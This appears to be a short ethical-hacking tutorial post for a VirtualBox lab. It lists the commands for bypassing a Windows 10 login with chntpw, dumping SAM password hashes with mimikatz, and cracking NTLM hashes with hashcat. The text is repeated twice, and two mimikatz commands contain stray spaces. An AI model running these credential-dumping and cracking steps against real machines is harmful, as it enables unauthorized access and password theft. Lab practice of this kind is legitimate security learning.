Hacking Windows 10 login, gaining access, escalating privileges and cracking NTLM hash passwords which is saved in SAM file.
Hacking Windows 10 | Ethical Hacking
I demonstrate the hacking technique using Windows 10 and Kali Linux.
Here is my youtube video.
youtu.be/4HAbwdWPpgk
It's straight forward.
Enjoy...

Our resources:
Virtual box
Windows 10 iso
Kali Linux 2021 iso
Here are all the commands used;
Linux commands:
chntpw -l SAM
chntpw -u (username) SAM
-l represents the list of users
-u represents the user
windows mimikatz commands:
lsadump::sam
privileg e::debug
token::whoami
token ::elevate
lsadump::sam
Linux commands:
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
Hacking Windows 10 | Ethical Hacking
I demonstrate the hacking technique using Windows 10 and Kali Linux.
Here is my youtube video.
youtu.be/4HAbwdWPpgk
It's straight forward.
Enjoy...


Our resources:
Virtual box
Windows 10 iso
Kali Linux 2021 iso
Here are all the commands used;
Linux commands:
chntpw -l SAM
chntpw -u (username) SAM
-l represents the list of users
-u represents the user
windows mimikatz commands:
lsadump::sam
privileg e::debug
token::whoami
token ::elevate
lsadump::sam
Linux commands:
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt